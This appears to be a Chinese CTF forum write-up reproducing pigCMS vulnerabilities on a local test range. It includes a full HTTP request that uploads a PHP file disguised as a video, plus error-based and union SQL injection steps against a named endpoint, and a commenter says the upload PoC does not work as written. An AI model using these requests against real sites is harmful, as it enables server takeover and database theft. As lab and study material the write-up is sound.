pigCMS靶场复现

ydop   ·   发表于 2023-09-25 14:02:38   ·   CTF&WP专版

一,任意文件上传,构造数据包

[POC]

  1. POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload HTTP/1.1
  2. Host: 127.0.0.1
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
  4. Accept-Encoding: gzip, deflate
  5. Content-Type: multipart/form-data; boundary=----aaa
  6. Content-Length: 142
  7. ------aaa
  8. Content-Disposition: form-data; name="filePath"; filename="demo1.php"
  9. Content-Type: video/x-flv
  10. <?php phpinfo();?>
  11. ------aaa

上传成功


拼接路径访问
http://127.0.0.1/cms/upload/images/2023/09/25/1695620019Vzzm.php

二,sql注入

1,报错注入

http://127.0.0.1/index.php?g=Wap&m=Dining&a=ShowDetail&id=3
添加单引号报错


使用报错注入查看版本号


使用sqlmap读取数据库

2,联合注入

31正常

32报错,因此存在31个字段


显错位在6,7,12

查询数据库,用户名,版本号


后续可以根据information_schema表进行查询,也可以直接丢到sqlmap

用户名金币积分时间理由
Track-魔方 300.00 0 2023-09-25 20:08:57 WriteUp奖励 300

打赏我,让我更有动力~

4 条回复   |  直到 9个月前 | 999 次浏览

Track-魔方
发表于 2023-9-25

手速相当快,

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-9-25

格式上再优化优化,比如加个三级标题啥的,SQL注入那里,还可以用联合注入,可以写一写,改一改我直接通过了

评论列表

  • 加载数据中...

编写评论内容

成风
发表于 9个月前

建议写一下这些接口怎么来的

评论列表

  • 加载数据中...

编写评论内容

成风
发表于 9个月前

文件上传的poc不能直接用,有问题

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.